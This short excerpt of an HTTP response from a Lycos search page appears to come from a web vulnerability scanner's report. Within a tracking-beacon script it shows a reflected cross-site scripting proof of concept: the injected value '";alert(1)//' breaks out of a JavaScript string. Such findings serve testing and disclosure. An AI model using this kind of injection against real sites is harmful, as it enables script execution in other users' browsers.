Content-Length: 17323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/video/",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A184a0";alert(1)//a41b54937a.lycos.com"
});
</script>
...[SNIP]...
